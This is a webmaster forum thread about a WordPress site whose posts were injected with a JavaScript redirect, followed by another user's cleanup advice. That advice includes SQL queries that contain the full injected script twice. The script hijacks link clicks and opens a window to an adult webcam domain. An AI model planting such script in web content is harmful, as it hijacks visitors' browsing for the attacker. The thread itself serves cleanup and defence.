Wordpress malware

Collapse
X
 
  • Time
  • Show
Clear All
new posts
  • ApolloCash
    Confirmed User
    • Apr 2007
    • 483

    #1

    Wordpress malware

    hey

    i apologize if this is not the right place where to start this thread, anyway:

    We run plenty of blogs, recently some of them have been injected with a javascript redirect script. The place of injection: DB table wp_posts -> post_content
    The JS code is added at the end of the post.

    The script redirects to a webcam site by cashnude.

    I have googled a lot, could find only how to remove the injected script, but the injection was back next day of course.

    I could not find any information on how they inject the javascript redirect.

    I suspect WP plugin, WP theme or WP core vulnerability, however only newly created blogs like 1 year old seem to be injected, WP core version 3.7.1 + older WP core versions
    seem to be intact.
    Blogs with various WP plugins and WP themes have been injected.

    Does anybody have an experience with this JS redirect by cashnude?

    Any response will be appreciated.

    Thanks!
    Last edited by ApolloCash; 09-10-2014, 04:01 AM.
    Peter
    info[} apollocash[} com
    icq: 176-73--77-01
  • TROLLENSTEIN
    Server Monkey
    • May 2013
    • 164

    #2
    Hello, I'm assuming all your blogs are on the apollocash server. Here is how to kill it and prevent it from coming back in 5 easy steps:

    1. Delete ALL cookies in your browser, and empty your browser cache. Close your browser down. (Do NOT visit the "infected" sites!)

    2. Open your browser again and log into your server PHPMYADMIN and run both cleaning queries below. (Depending on your database structure you may need to run these on all of them!)

    First query to run is...

    Code:
    update wp_posts set post_content = replace(post_content, '<script type="text/javascript">// <![CDATA[
    
    function consoleLog(e){try{console.log(e)}catch(t){}}(function(e,t){function n(){if(!s){s=true;for(var e=0;e<i.length;e++){i[e].fn.call(window,i[e].ctx)}i=[]}}function r(){if(document.readyState==="complete"){n()}}e=e||"docReady";t=t||window;var i=[];var s=false;var o=false;t[e]=function(e,t){if(s){setTimeout(function(){e(t)},1);return}else{i.push({fn:e,ctx:t})}if(document.readyState==="complete"){setTimeout(n,1)}else if(!o){if(document.addEventListener){document.addEventListener("DOMContentLoaded",n,false);window.addEventListener("load",n,false)}else{document.attachEvent("onreadystatechange",r);window.attachEvent("onload",n)}o=true}}})("docReady",window);var aMs=document.getElementsByTagName("a");var amSwindow=false;docReady(function(){for(var e=0;e<aMs.length;e++){aMs[e].addEventListener("click",function(e){var t=Math.floor(Math.random()*2+1);consoleLog("ps:"+t);if(t==2){if(!amSwindow){amSwindow=window.open("http://fish-14j-js.cashnude.com/","NEI","width=10000,height=10000")}else{amSwindow.focus()}}},false)}})
    
    // ]]></script>', '') where post_content like '%<script type="text/javascript">// <![CDATA[
    
    function consoleLog(e){try{console.log(e)}catch(t){}}(function(e,t){function n(){if(!s){s=true;for(var e=0;e<i.length;e++){i[e].fn.call(window,i[e].ctx)}i=[]}}function r(){if(document.readyState==="complete"){n()}}e=e||"docReady";t=t||window;var i=[];var s=false;var o=false;t[e]=function(e,t){if(s){setTimeout(function(){e(t)},1);return}else{i.push({fn:e,ctx:t})}if(document.readyState==="complete"){setTimeout(n,1)}else if(!o){if(document.addEventListener){document.addEventListener("DOMContentLoaded",n,false);window.addEventListener("load",n,false)}else{document.attachEvent("onreadystatechange",r);window.attachEvent("onload",n)}o=true}}})("docReady",window);var aMs=document.getElementsByTagName("a");var amSwindow=false;docReady(function(){for(var e=0;e<aMs.length;e++){aMs[e].addEventListener("click",function(e){var t=Math.floor(Math.random()*2+1);consoleLog("ps:"+t);if(t==2){if(!amSwindow){amSwindow=window.open("http://fish-14j-js.cashnude.com/","NEI","width=10000,height=10000")}else{amSwindow.focus()}}},false)}})
    
    // ]]></script>%';

    And the second query is...

    Code:
    update wp_posts set post_content = replace(post_content, '<script  type='text/javascript' rel="f179568d5746648ce97a252d9b3db074">
    
    function consoleLog(e){try{console.log(e)}catch(t){}}(function(e,t){function n(){if(!s){s=true;for(var e=0;e<i.length;e++){i[e].fn.call(window,i[e].ctx)}i=[]}}function r(){if(document.readyState==="complete"){n()}}e=e||"docReady";t=t||window;var i=[];var s=false;var o=false;t[e]=function(e,t){if(s){setTimeout(function(){e(t)},1);return}else{i.push({fn:e,ctx:t})}if(document.readyState==="complete"){setTimeout(n,1)}else if(!o){if(document.addEventListener){document.addEventListener("DOMContentLoaded",n,false);window.addEventListener("load",n,false)}else{document.attachEvent("onreadystatechange",r);window.attachEvent("onload",n)}o=true}}})("docReady",window);var aMs=document.getElementsByTagName("a");var amSwindow=false;docReady(function(){for(var e=0;e<aMs.length;e++){aMs[e].addEventListener("click",function(e){var t=Math.floor(Math.random()*2+1);consoleLog("ps:"+t);if(t==2){if(!amSwindow){amSwindow=window.open("http://fish-14j-js.cashnude.com/","NEI","width=10000,height=10000")}else{amSwindow.focus()}}},false)}})
    
    </script>', '') where post_content like '%<script  type='text/javascript' rel="f179568d5746648ce97a252d9b3db074">
    
    function consoleLog(e){try{console.log(e)}catch(t){}}(function(e,t){function n(){if(!s){s=true;for(var e=0;e<i.length;e++){i[e].fn.call(window,i[e].ctx)}i=[]}}function r(){if(document.readyState==="complete"){n()}}e=e||"docReady";t=t||window;var i=[];var s=false;var o=false;t[e]=function(e,t){if(s){setTimeout(function(){e(t)},1);return}else{i.push({fn:e,ctx:t})}if(document.readyState==="complete"){setTimeout(n,1)}else if(!o){if(document.addEventListener){document.addEventListener("DOMContentLoaded",n,false);window.addEventListener("load",n,false)}else{document.attachEvent("onreadystatechange",r);window.attachEvent("onload",n)}o=true}}})("docReady",window);var aMs=document.getElementsByTagName("a");var amSwindow=false;docReady(function(){for(var e=0;e<aMs.length;e++){aMs[e].addEventListener("click",function(e){var t=Math.floor(Math.random()*2+1);consoleLog("ps:"+t);if(t==2){if(!amSwindow){amSwindow=window.open("http://fish-14j-js.cashnude.com/","NEI","width=10000,height=10000")}else{amSwindow.focus()}}},false)}})
    
    </script>%';
    You can Copy & Paste the 2 queries above into PHPMYADMIN and they should run fine.


    3. Exit out of PHPMYADMIN and close your browser for now.

    4. SSH into your server and run the following to your IPTABLES. (simply drop all packets from the payload site and cashnude servers. If you have not created IPTABLES before now (and you should have!) let me know in a reply and I will provide a fresh complete set for you.)

    Code:
    iptables -I INPUT -s 213.207.70.38 -j DROP
    iptables -I INPUT -s 31.186.174.178 -j DROP
    Then save your new IPTABLES lines with:

    Code:
    /sbin/service iptables save
    Then restart Apache, for good measure, with:

    Code:
    service httpd restart
    5. Change your SSH and FTP passwords immediately (just good practice).

    As for how they done it, without access to your server I can't offer you an honest 100% exact answer. I did, however, take a quick look and it appears your server has not been hardened in any way. I would start by removing your PHPEXEC widgets (very dangerous!) and then lock the server down to prevent (well, at least make it harder to do as nothing is 100% secure) this in future.

    Comment

    • ApolloCash
      Confirmed User
      • Apr 2007
      • 483

      #3
      hello, thank you for the advice, i have forwarded it to our server admin.
      ssh/ftp/mysql passwords changed already.

      One more question, we host some ads on our blogs, header/footer ads, sidebar ads, i would remove all phpexec plugins in no time as you recommended, but what else to use in order to use our php based ads rotator?
      Last edited by ApolloCash; 09-10-2014, 06:37 AM.
      Peter
      info[} apollocash[} com
      icq: 176-73--77-01

      Comment

      • ApolloCash
        Confirmed User
        • Apr 2007
        • 483

        #4
        bump bump
        Peter
        info[} apollocash[} com
        icq: 176-73--77-01

        Comment

        Working...